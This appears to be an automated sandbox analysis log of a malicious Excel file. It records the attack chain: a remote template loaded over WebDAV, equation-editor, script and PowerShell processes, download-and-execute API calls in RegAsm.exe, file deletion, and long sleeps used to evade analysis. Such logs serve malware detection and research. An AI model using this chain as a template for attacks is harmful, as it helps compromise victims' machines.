            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
            Office drops RTF file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc.0.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: D09A9DB5.doc.4.drJump to dropped file
            Office viewer loads remote template
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406EB0 ShellExecuteW,URLDownloadToFileW,12_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: AWD 490104998518.xlsStream path 'MBD001EFDD9/Package' entropy: 7.98076101306 (max. 8.0)
            Source: AWD 490104998518.xlsStream path 'Workbook' entropy: 7.9994313604 (max. 8.0)
            Source: ~DFE4D87C1F83611F19.TMP.0.drStream path 'Package' entropy: 7.97685690997 (max. 8.0)
            Source: 90530000.0.drStream path 'MBD001EFDD9/Package' entropy: 7.97685690997 (max. 8.0)
            Source: 90530000.0.drStream path 'Workbook' entropy: 7.99950304966 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040F7A7 Sleep,ExitProcess,12_2_0040F7A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A748
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4165Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 602Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 908Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8516Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1599Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3140Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -599797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -3000000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400Thread sleep count: 251 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400Thread sleep time: -125500s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408Thread sleep count: 908 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408Thread sleep time: -2724000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3480Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408Thread sleep count: 8516 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3408Thread sleep time: -25548000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_12-49192
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004432B5 mov eax, dword ptr fs:[00000030h]12_2_004432B5
